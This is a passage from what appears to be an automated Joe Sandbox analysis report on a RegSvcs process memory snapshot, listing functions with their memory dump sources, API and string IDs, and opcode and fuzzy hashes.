                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 1b8393d05116431a7e6f0952bf97f52b5a1e50c06c254e5734058114392d0c01
                                                              • Instruction ID: 00b927a9c87addf61aa1974cd8d3e1404196564c3382ae233df911a40e3f51dd
                                                              • Opcode Fuzzy Hash: 1b8393d05116431a7e6f0952bf97f52b5a1e50c06c254e5734058114392d0c01
                                                              • Instruction Fuzzy Hash: 2D516B7490820697D713B71FC90136B2B94EB50760F14C97FE4E68E3F9DA3488968F8A
                                                              Function 013F4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$Flst
                                                              • API String ID: 0-758220159
                                                              • Opcode ID: 796587dff25c44063977e7f70657da72e7ed0e30c0cfe46304ebe536a84a0c1b
                                                              • Instruction ID: 75bf2418410fc10d793a7e9ecf6958179e8c3f3c51222f02deb2a495a32f98ba
                                                              • Opcode Fuzzy Hash: 796587dff25c44063977e7f70657da72e7ed0e30c0cfe46304ebe536a84a0c1b
                                                              • Instruction Fuzzy Hash: 18517FB1E002598FDF26CF99C58466EFBF4FF44718F15802EE2499B2A6E7709945CB80
                                                              Function 0143FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $
                                                              • API String ID: 3446177414-3993045852
                                                              • Opcode ID: 1055712d76a82b28827bdac390eb7e4f59e4c445e2d557848f5597855c09ea55
                                                              • Instruction ID: 4a371b29574eef4d55c9f1455ff978c5c09aa2f99949dbefb82e3591f1490f5f
                                                              • Opcode Fuzzy Hash: 1055712d76a82b28827bdac390eb7e4f59e4c445e2d557848f5597855c09ea55
                                                              • Instruction Fuzzy Hash: E3419CB5E00209ABDF11DF99C885AEFBBB5FF88B14F14001AEE11A7361D7719915CBA0
                                                              Function 013BDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0$0
                                                              • API String ID: 3446177414-203156872
                                                              • Opcode ID: 645884f6751fc2d1a4672aec50a9a4a37833dc3d95341e19efe103e93b28b76d
                                                              • Instruction ID: 355a87748421e903e8bfaa6cac84f108c95d7859f26cdc417302e68e910109f0
                                                              • Opcode Fuzzy Hash: 645884f6751fc2d1a4672aec50a9a4a37833dc3d95341e19efe103e93b28b76d
                                                              • Instruction Fuzzy Hash: 5F418DB26087069FC311CF6DC484A56BBE5BB88308F04492EFA88DB751D731E909CB82